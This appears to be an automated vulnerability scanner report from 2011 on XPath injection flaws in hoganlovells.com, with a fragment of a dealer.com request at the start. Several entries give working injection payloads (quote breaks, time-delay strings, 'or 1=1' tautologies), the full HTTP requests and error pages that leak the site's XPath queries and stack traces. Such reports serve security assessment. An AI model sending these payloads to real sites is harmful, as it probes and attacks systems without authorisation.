   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-a
...[SNIP]...

Request 2

GET /solutions/oem/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/oem/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=405dbe54cabfaef5)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003121; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.56.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19998
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Whether you are 1000 miles away or whether you&#8217;re 100 miles away, you really feel that you&#8217;re part of this Dealer.com family.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From an Enterprise Level, Dealer.com's products have saved me hours a month in gathering my reporting and understanding what our site is doing for us. </p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile
...[SNIP]...
2. XPath injection  previous  next
There are 32 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

2.1. http://www.hoganlovells.com/AboutUs/Online_Client [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs')waitfor%20delay'0%3a0%3a20'--/Online_Client HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:19 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6683
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.</title>
<style>
body {font-fa
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.2. http://www.hoganlovells.com/AboutUs/Online_Client [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...
2.3. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs'/Online_Client_Service/Overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8252
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...
2.4. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client_Service'/Overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:41 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...
2.5. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client_Service/Overview'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:46 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6763
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>

...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.6. http://www.hoganlovells.com/aboutus/history/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus'/history/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...
2.7. http://www.hoganlovells.com/aboutus/history/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus/history')waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:22 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6653
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.8. http://www.hoganlovells.com/aboutus/overview/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus'/overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...
2.9. http://www.hoganlovells.com/aboutus/overview/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus/overview'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:02 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6653
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.10. http://www.hoganlovells.com/newsmedia/awardsrankings [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia')waitfor%20delay'0%3a0%3a20'--/awardsrankings HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6698
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.</title>
<style>
body {font
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.11. http://www.hoganlovells.com/newsmedia/awardsrankings [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/awardsrankings' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:11 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...
2.12. http://www.hoganlovells.com/newsmedia/awardsrankings/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 92224765'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia92224765'%20or%201%3d1--%20/awardsrankings/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8180
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.</title>
<style>
body {font-f
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.]
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5070035
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput) +19
MS.Inter
...[SNIP]...
2.13. http://www.hoganlovells.com/newsmedia/awardsrankings/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/awardsrankings'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
